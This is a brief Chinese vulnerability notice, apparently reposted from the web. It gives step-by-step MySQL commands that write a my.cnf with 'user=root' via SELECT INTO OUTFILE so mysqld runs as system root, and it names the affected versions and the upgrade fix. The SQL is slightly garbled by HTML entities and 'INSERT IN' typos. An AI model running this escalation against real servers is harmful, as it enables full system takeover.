| 关键词: mysql ROOT 密码 mysqld 漏洞 系统 文件 cnf roottext hack |
在 /etc 目录下有 my.cnf的情况下,通过以下操作,可让mysqld在重新启动之后以ROOT身份运行,用mysql root连接并输入如下命令:mysql>CREATE DATABASE roottext;mysql>USE roottext;mysql>CREATE TABLE hack (conf VARCHAR(80));mysql>INSERT IN hack &#118alueS ('[mysqld]');mysql>INSERT IN hack &#118alueS ('user=root');mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hackmysql>QUIT这样便在mysql的数据目录创建一个含有下面内容的文件my.cnf[mysqld]user=root在mysql重起之后,此文件将覆盖 /etc/my.cnf的内容,mysqld将以root身份运行,这意味着你也同时拥有系统的root权限了,如通过使用创建适当形式的数据表并通过 INTO OUTFILE 创建或改写目标主机上任意文件等说明:尽管此漏洞需要获得MySQL的root密码,这事实上是大多数系统root才掌握的密码。不过因为此密码通常比系统的root密码更容易得到,如果入侵者获得此密码,利用此漏洞,这个系统将彻底被控制。特别在mysql 有此漏洞版本:小于 MySQL 3.23.56 的所有版本解决方法:升级到 MySQL 3.23.56 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|